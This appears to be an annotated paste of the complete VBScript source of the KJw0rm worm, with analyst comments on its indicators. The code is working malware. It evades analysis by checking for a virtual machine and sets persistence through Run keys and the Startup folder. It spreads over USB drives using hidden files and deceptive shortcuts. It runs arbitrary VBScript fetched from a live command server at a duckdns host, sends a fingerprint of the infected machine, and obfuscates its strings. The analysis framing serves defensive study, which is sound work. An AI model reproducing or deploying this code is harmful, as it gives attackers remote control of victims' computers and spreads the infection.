James_inthe_box

kjw0rm

Jul 22nd, 2019
  1. 'MrLi0nHere
  2. 'KJw0rm
  3. 'Thanx njq8
      ' Analyst note: top-level flow of the sample. It sets the globals used by
      ' every routine below, calls vmcheck and ins, then polls the configured
      ' host in an endless loop and acts on the reply.
      ' Indicators visible in this section: the host name and port below, the
      ' drop path %TEMP%\System.vbs, and the response delimiter "KsKsK".
  4. On Error Resume Next
  5. dim sh ' shell
  6. set sh =WScript.CreateObject("WScript.Shell")
  7. dim fs ' filesystem
  8. set fs= CreateObject("Scripting.FileSystemObject")
      ' dotnet records whether the .NET 2.0 vbc.exe compiler exists on disk;
      ' the value is later placed in the check-in string built by inf.
  9. dim dotnet
  10. dotnet="No"
  11. if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  12. dotnet="Yes"
  13. end if
      ' Environment check runs before any file or registry write (see vmcheck).
  14. vmcheck
      ' host/port are joined by post() into http://<host>:<port>/<cmd>.
  15. dim host
  16. host= "windowshelp1234.duckdns.org"
  17. dim port
  18. port=33256
      ' DR & FN together form the path the script copies itself to.
  19. dim DR
  20. DR = sh.ExpandEnvironmentStrings("%TEMP%") & "\"
  21. dim FN
  22. FN ="System.vbs"
      ' fh later holds the text-stream handle opened by ins on the dropped copy.
  23. dim fh
      ' "~" is a sentinel; ins overwrites it with the value read from HKCU\KJ.
  24. dim us
  25. us="~"
      ' ins copies the script to DR & FN and then calls xins (persistence/spread).
  26. ins
      ' spl is the field separator expected in the server's response text.
  27. dim spl
  28. spl="KsKsK"
  29. dim i
  30. i=0
      ' Polling loop: POST "ready", split the reply on spl, dispatch on field 0.
  31. while true
  32. dim a
  33. a= split(post("ready",""),spl)
  34. select case a(0)
      ' "exc": field 1 of the reply is passed to Execute, so whatever VBScript
      ' the remote host returns runs in this process with the user's rights.
  35. case "exc"
  36. dim sa
  37. sa= a(1)
  38. execute sa
      ' "uns": calls the removal routine with an empty argument, which ends the script.
  39. case "uns"
  40. uns ""
  41. end select
      ' 4-second pause between polls; every third iteration xins is called
      ' again, rewriting the Run values and removable-drive copies.
  42. wscript.sleep 4000
  43. i = i + 1
  44. if i> 2 then
  45. i=0
  46. xins
  47. end if
  48. wend
  49. function vmcheck()
      ' Analyst note: virtual-machine check. Queries WMI class
      ' Win32_ComputerSystemProduct and, if any returned Name contains
      ' "virtual" (case-insensitive), deletes the running script file and then
      ' sleeps in an endless loop, so none of the later routines run.
      ' When triaging: a wscript/cscript process that stays alive but idle with
      ' its script file gone from disk is consistent with this branch.
  50. On Error Resume Next
  51. Set WMI = GetObject("WinMgmts:")
  52. Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
  53. For Each Ob in Col
  54. if instr( lcase( ob.name),"virtual") >0 then
  55. On Error Resume Next
      ' Self-delete, then idle forever instead of exiting.
  56. fs.deletefile(wscript.scriptfullname)
  57. do
  58. wscript.sleep(1000)
  59. loop
  60. end if
  61. next
  62. end Function
  63. function ins
      ' Analyst note: install routine. Records a marker in the registry,
      ' copies the running script to DR & FN (%TEMP%\System.vbs), opens that
      ' copy, and calls xins.
      ' Host artifact: a REG_SZ value written as "HKCU\KJ" holding "Yes" or "No".
  64. on error resume next
      ' If the value does not exist the read fails silently and us keeps the
      ' "~" sentinel assigned at the top of the script.
  65. us= sh.regread("HKCU\KJ")
  66. if us="~" then
      ' Compares the script path, minus its first character, with ":\System.vbs":
      ' true only when the script is running from the root of a drive.
      ' NOTE(review): presumably this marks a first run that came from an
      ' infected removable drive - inferred from xins, confirm against other samples.
  67. if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
  68. us="Yes"
  69. sh.regwrite "HKCU\KJ", us, "REG_SZ"
  70. else
  71. us="No"
  72. sh.regwrite "HKCU\KJ", us, "REG_SZ"
  73. end if
  74. end if
  75. Err.Clear
      ' Copy self to the drop path (overwrite allowed), then open the copy in
      ' append mode (8) without creating it; the handle stays in the global fh.
  76. fs.CopyFile wscript.scriptfullname,dr & fn ,true
  77. set fh = fs.OpenTextFile( dr & fn, 8, false)
      ' An error with a positive number from the copy or open ends the script here.
  78. if Err.Number>0 then
  79. wscript.quit
  80. end if
  81. xins
  82. end function
  83. sub xins
      ' Analyst note: persistence and removable-drive propagation. Called once
      ' from ins and again on every third poll of the main loop.
      ' Host artifacts to look for:
      '   - Run values named "System.vbs" under HKCU and HKLM
      '     Software\Microsoft\Windows\CurrentVersion\Run, data = quoted drop path
      '   - System.vbs in the user's Startup folder
      '   - on removable drives: System.vbs at the root, hidden files/folders,
      '     a "Videos" folder, and .lnk files whose target is cmd.exe with
      '     arguments beginning "/c start System.vbs&start"
  84. on error resume next
      ' Errors are suppressed, so a failed write (for example the HKLM value
      ' when the account lacks the rights) does not stop the routine.
  85. sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
  86. sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
      ' NameSpace(&H7) is the shell's Startup special folder.
  87. fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
      ' Only drives that are ready, have free space and report DriveType 1
      ' (removable) are touched.
  88. for each xx in fs.Drives
  89. if xx.isready then
  90. if xx.FreeSpace >0 then
  91. if xx.drivetype=1 then
      ' Clear attributes on an existing copy so the overwrite below succeeds.
  92. if fs.fileexists(xx.path & "\" & fn) then
  93. fs.getfile(xx.path & "\" & fn).Attributes=0
  94. end if
  95. fs.copyfile dr & fn , xx.path & "\" & fn,true
      ' mx caps the number of shortcuts created for root-level files at 20.
  96. dim mx
  97. mx=0
  98. for Each x In fs.GetFolder( xx.path & "\" ).Files
  99. if mx=20 then
  100. exit for
  101. end if
  102. wscript.sleep 1
      ' Files that have an extension other than "lnk" are set to Hidden (2);
      ' this includes the script copy itself, which gets no shortcut.
  103. if instr(x.name,".") Then
  104. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
  105. x.Attributes = 2
  106. if ucase(x.name) <> ucase(fn) Then
  107. mx =mx +1
      ' Shortcut "<file name>.lnk": runs cmd.exe minimized (WindowStyle 7),
      ' which starts the script and then the original file. The icon is the
      ' DefaultIcon registered in HKLM\SOFTWARE\Classes for the file's extension.
  108. With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
  109. .TargetPath = "cmd.exe"
  110. .WorkingDirectory = ""
  111. .WindowStyle=7
  112. .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
  113. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  114. .IconLocation = sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  115. if instr( .iconlocation,",")=0 then
  116. .iconlocation = .iconlocation &",0"
  117. end if
  118. .Save()
  119. end with
  120. end if
  121. end if
  122. end if
  123. Next
      ' Second pass: create a "Videos" folder, then hide up to 20 root-level
      ' subfolders and give each a shortcut that uses the SHELL32.dll,3 icon,
      ' starts the script, and then opens explorer.
  124. mx=0
  125. fs.CreateFolder(xx.path & "\Videos\" )
  126. for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
  127. if mx=20 then
  128. exit for
  129. end if
  130. wscript.sleep 1
  131. x.Attributes = 2
  132. mx =mx +1
  133. With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
  134. .TargetPath = "cmd.exe"
  135. .WorkingDirectory = ""
  136. .WindowStyle=7
  137. .Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34)) & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
  138. .IconLocation = "%windir%\system32\SHELL32.dll,3"
  139. .Save()
  140. end with
  141. Next
  142. end if
  143. end if
  144. end if
  145. next
  146. Err.Clear
  147. end sub
  148. function uns(ex)
      ' Analyst note: removal routine, reached from the "uns" command in the
      ' main loop (there always with ex = ""). It deletes the Run values, the
      ' dropped copy and the Startup copy, reverts the drive changes made by
      ' xins, optionally launches ex, and quits.
      ' For incident response: it does not touch the HKCU\KJ value written by
      ' ins, and it resets file/folder attributes to 0 rather than restoring
      ' whatever attributes they had before.
  149. on error resume Next
      ' fi is not declared anywhere in the visible script; the failure is
      ' hidden by the error suppression above.
  150. fi.close
  151. fh.close
  152. sh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  153. sh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  154. fs.DeleteFile dr & fn ,true
  155. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
      ' Unlike xins, this walks every ready drive with free space, not only
      ' drives of type 1.
  156. for each xx in fs.Drives
  157. if xx.isready then
  158. if xx.FreeSpace >0 then
      ' Root-level files with a non-"lnk" extension: clear attributes, delete
      ' the matching "<name>.lnk"; the script copy itself is deleted instead.
  159. For Each x In fs.GetFolder( xx.path & "\").Files
  160. On Error Resume Next
  161. if instr(x.name,".") then
  162. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  163. x.Attributes = 0
  164. if ucase(x.name) <> ucase(fn) then
  165. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  166. else
  167. fs.deletefile( xx.path & "\" & x.name )
  168. end if
  169. end if
  170. end If
  171. Next
      ' Root-level folders: delete "<folder>.lnk" if present and clear attributes.
  172. For Each x In fs.GetFolder( xx.path & "\").SubFolders
  173. On Error Resume Next
  174. if fs.fileexists( xx.Path & "\" & x.Name &".lnk") then
  175. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  176. end if
  177. x.Attributes = 0
  178. Next
  179. end if
  180. end if
  181. Next
      ' Waits on w.readystate for at most 10 one-second sleeps; w is not
      ' declared in the visible script.
  182. Dim tout
  183. tout=0
  184. Do until w.readystate=4
  185. wscript.sleep(1000)
  186. tout =tout + 1
  187. If tout=10 Then Exit do
  188. Loop
      ' A non-empty ex is started through cmd.exe with a hidden window (style 0)
      ' and without waiting for it to finish.
  189. if ex<>"" then
  190. sh.Run "cmd.exe /c ping 0&start " & ex,0, false
  191. end if
  192. wscript.quit
  193. end function
  194. function post(cmd ,da)
      ' Analyst note: the only network routine in the visible script. Sends a
      ' synchronous POST over plain HTTP to http://<host>:<port>/<cmd> with da
      ' as the body and returns the response text ("" is the initial value).
      ' Network signature: the main loop calls this with cmd = "ready" and an
      ' empty body about every 4 seconds, and the host-profile string from inf
      ' travels in a request header written as "User-Agent:" (colon included).
      ' Nothing in this routine encrypts or authenticates the exchange.
  195. post=""
  196. Dim o
  197. Set o = CreateObject("MSXML2.XMLHTTP")
  198. o.open "POST","http://" & host & ":" & port &"/" & cmd, false
  199. o.setRequestHeader "User-Agent:", inf
  200. o.send da
  201. post=o.responseText
  202. end function
  203. dim xinf
  204. function inf
      ' Analyst note: builds the backslash-separated host profile sent with
      ' every request by post(), and caches it in the global xinf so the WMI
      ' queries run only once. Field order as assembled below:
      '   HWD \ COMPUTERNAME \ USERNAME \ OS string \ country code \ 0.5X \
      '   dotnet & nf \ us \ HWD
      ' The chrw()/arithmetic expressions are string obfuscation only; the
      ' decoded values are given next to each line.
      ' NOTE(review): "0.5X" looks like a build/version tag - not confirmed by the code.
  205. on error resume next
  206. if xinf="" then
      ' Each field is pre-set to "??" so that value is sent if the lookup fails.
  207. dim s
  208. s="??"
  209. s = hwd
  210. inf = inf & s & "\"
  211. s="??"
  212. s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
  213. inf = inf & s & "\"
  214. s="??"
  215. s= sh.ExpandEnvironmentStrings("%USERNAME%")
  216. inf = inf & s & "\"
  217. s="??"
      ' Decodes to: winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2
  218. Set szxquzftjy = GetObject( "w" & chrw(cint(33+72)) & "n" & "m" & "g" & "m" & "t" & chrw(cint(124-9)) & ":" & chrw(cint(2.86046511627907 * 43)) & chrw(cint(105)) & chrw(cint(63+46)) & "p" & "e" & chrw(3534 / 31) & chrw(115) & chrw(2775 / 25) & "n" & chrw(87+10) & "t" & "i" & chrw(13+98) & "n" & chrw(76) & "e" & chrw(cint(93+25)) & "e" & chrw(3888 / 36) & "=" & "i" & "m" & "p" & chrw(101) & chrw(3876 / 34) & chrw(115) & "o" & "n" & "a" & chrw(cint(116)) & chrw(cint(101)) & chrw(32 * 3.90625) & chrw(cint(51-18)) & "\" & chrw(6+86) & "." & chrw(cint(71+21)) & chrw(72+42) & "o" & chrw(111) & chrw(116) & chrw(cint(92)) & chrw(17+82) & "i" & chrw(218 / 2) & chrw(139-21) & chrw(300 / 6) )
      ' Decodes to: Select * from Win32_OperatingSystem
  219. Set yyotvzirsq = szxquzftjy.ExecQuery ( "S" & "e" & chrw(cint(3 * 36)) & "e" & chrw(107-8) & "t" & chrw(cint(46+-14)) & "*" & chrw(cint(9+23)) & "f" & "r" & "o" & "m" & " " & "W" & chrw(2.28260869565217 * 46) & chrw(102+8) & chrw(2.04 * 25) & "2" & "_" & chrw(32+47) & chrw(112) & chrw(48 * 2.10416666666667) & "r" & "a" & chrw(117-1) & chrw(cint(105 / 1)) & chrw(cint(66+44)) & "g" & chrw(71+12) & chrw(cint(4+117)) & "s" & chrw(cint(116)) & "e" & chrw(1090 / 10) )
  220. dim cstdspjgkz
      ' First result only: OS caption & " SP" & service-pack major version,
      ' plus the OS country code.
  221. For Each aaa in yyotvzirsq
  222. jgduwnagqo= aaa.Caption & " " & chrw(82+1) & chrw(14+66) & aaa.ServicePackMajorVersion
  223. cstdspjgkz= aaa.countrycode
  224. exit for
  225. Next
      ' Shortens the caption: removes "Microsoft", replaces "Windows " with
      ' "Win", and replaces " Win" with "Win".
  226. jgduwnagqo= replace(jgduwnagqo, chrw(31+46) & chrw(cint(109-4)) & "c" & "r" & "o" & "s" & "o" & chrw(cint(102)) & "t" ,"")
  227. jgduwnagqo= replace(jgduwnagqo, "W" & chrw(cint(3150 / 30)) & chrw(cint(21 * 5.23809523809524)) & chrw(3700 / 37) & "o" & chrw(101+18) & "s" & chrw(32) , "W" & chrw(20+85) & "n" )
  228. jgduwnagqo= Replace(jgduwnagqo, " " & chrw(21.75 * 4) & "i" & "n" , "W" & chrw(20+85) & "n" )
      ' Appends " x" and the AddressWidth of
      ' winmgmts:root\cimv2:Win32_Processor='cpu0' (decoded object path).
  229. jgduwnagqo = jgduwnagqo & chrw(cint(73-41)) & "x" & GetObject( chrw(5950 / 50) & chrw(735 / 7) & "n" & chrw(30+79) & chrw(4.47826086956522 * 23) & "m" & "t" & "s" & chrw(cint(38+20)) & "r" & "o" & "o" & chrw(116) & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & chrw(210 / 2) & "n" & "3" & chrw(1800 / 36) & "_" & chrw(cint(10+70)) & "r" & "o" & chrw(27+72) & chrw(3030 / 30) & chrw(cint(49 * 2.3469387755102)) & chrw(115) & "o" & chrw(cint(124-10)) & "=" & chrw(cint(8+31)) & chrw(99) & chrw(112) & "u" & "0" & "'" ).AddressWidth
  230. inf = inf & jgduwnagqo & "\" & cstdspjgkz &"\0.5X\" & dotnet & nf &"\" & us &"\" & HWD
  231. xinf=inf
  232. else
  233. inf=xinf
  234. end if
  235. end function
  236. function HWD
      ' Analyst note: host identifier used twice in the check-in string built
      ' by inf. Returns "KJw0rm_" followed by the VolumeSerialNumber of the
      ' first Win32_LogicalDisk entry that has one; if the WMI query fails or
      ' yields no serial, the default "KJw0rm" is returned.
  237. HWD="KJw0rm"
  238. On Error Resume Next
  239. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  240. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
  241. For Each aaa In aa
  242. if aaa.VolumeSerialNumber<>"" then
  243. HWD= "KJw0rm_" & aaa.VolumeSerialNumber
  244. exit for
  245. end if
  246. Next
  247. end function
  248. Function nf
      ' Analyst note: reads the subkey names of
      ' HKLM\SOFTWARE\Microsoft\.NETFramework\Policy through the WMI StdRegProv
      ' provider (&H80000002 is HKEY_LOCAL_MACHINE) and returns the last name
      ' that contains "v". The result is appended to the dotnet flag in inf.
      ' NOTE(review): presumably this reports an installed .NET version label -
      ' inferred from the key path, the code only matches on the letter "v".
  249. On Error Resume next
  250. Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  251. Dim aSub, sKey , v
  252. oReg.EnumKey &H80000002,"SOFTWARE\Microsoft\.NETFramework\Policy", aSub
  253. For Each sKey In aSub
  254. If InStr(sKey,"v") > 0 Then
  255. v = sKey
  256. End if
  257. Next
  258. nf = v
  259. End Function